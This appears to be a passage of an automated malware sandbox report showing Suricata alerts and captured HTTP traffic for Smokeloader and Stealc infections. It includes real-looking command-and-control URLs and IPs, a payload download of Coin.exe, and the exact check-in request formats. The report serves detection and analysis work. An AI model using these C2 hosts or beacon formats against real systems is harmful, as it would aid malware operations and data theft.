Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49734 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49738 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49741 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49741 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49729 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49738 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49739 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49742 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49743 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49726 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49727 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49737 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49745 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49748 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49748 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49746 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49747 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49747 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49750 -> 2.185.214.11:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.152 443			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.185.214.11 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	URLs: http://epohe.ru/tmp/
Source: Malware configuration extractor	URLs: http://olihonols.in.net/tmp/
Source: Malware configuration extractor	URLs: http://nicetolosv.xyz/tmp/
Source: Malware configuration extractor	URLs: http://jftolsa.ws/tmp/

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 34 34 36 44 41 46 41 45 33 34 31 35 39 34 39 33 34 32 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"7E446DAFAE341594934204------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"default------CFIEGDAEHIEHIDHJDAAK--

Source: Joe Sandbox View	ASN Name: M247GB M247GB
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: TCIIR TCIIR

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49744 -> 84.32.84.152:443

Source: global traffic	HTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fwivmymbxwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bvrcwhkhepnussxw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bfuqgtbxdbrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nysunlaoxsnx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mngbwwbxxtu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mtxcnwqijndc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbbemhvyacupfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pnkjbaopqllltj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xabepmucutwrclm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ciagjuvshwyap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dlseqphhdlmhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oydqaptimmqlwlr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ubqxonkbwrw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://llwvqfhgyhhpg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yinxmrewdxvvup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iyfnrlbdswaun.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://glhjgpfospwhdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gcybmsqpemm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ltleqvppjdrlod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atmipbdihgavjw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lefbfksalyjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wiitjtnnnvend.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rkfklwpuiufh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xqysrgfmfacgd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjsidbjqhyjuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjsidbjqhyjuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: epohe.ruData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d 68 23 9c ab e4 7d 14 85 cc db ee f5 79 6f 88 9e b7 cd b2 1a b3 e2 ea 40 d4 17 2f 35 30 11 6e 91 11 b0 4e 3b 8c 8c ec bb ea ad 5e 68 f4 b5 cb 75 c6 5b ba 16 a8 00 d3 4d 6c 47 98 31 5e dd 5b 1a 47 37 9c 53 98 f4 b3 be cb c6 9c ec b2 34 eb c5 c4 7e 51 e3 07 2e c0 b4 47 a4 5e 3d 45 f0 93 a3 af d7 ba f5 da 9b c0 13 1c e1 ae 95 36 d5 fe 9d 53 ab 03 d2 f5 e0 ba 96 c7 c6 80 42 23 91 93 e0 45 25 ce ce c6 1b 17 94 c1 05 ff 77 6b 29 a0 77 a5 d6 99 1e bb db 05 78 67 96 22 1c e6 c5 38 f2 11 0c b6 dd be 89 85 0b bc b2 b2 77 f5 2b c6 10 0d 81 e9 bf 1f d4 2a 32 d8 1d 27 13 9d 4d 73 e8 c3 a0 3f cf 52 e1 48 9b ea 7a 9e 18 2b 73 44 27 e5 ea 01 46 d5 b8 74 9a c8 75 61 2a ac d7 ad 19 36 4c 1a 4a c2 f7 cb 0b f1 bd e1 a6 ca 00 15 6f 8e 4d 93 df ce 26 eb 71 81 27 58 9b f8 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8w+2'Ms?RHz+sD'Ftua6LJoM&q'X
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rbkqrcgmoxbnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ytcopihlywgad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ylpbksvjwmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lumgcfdgtsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlfvvperahgbd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: epohe.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: epohe.ru
Source: global traffic	DNS traffic detected: DNS query: www.darkviolet-alpaca-923878.hostingersite.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwivmymbxwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: epohe.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE 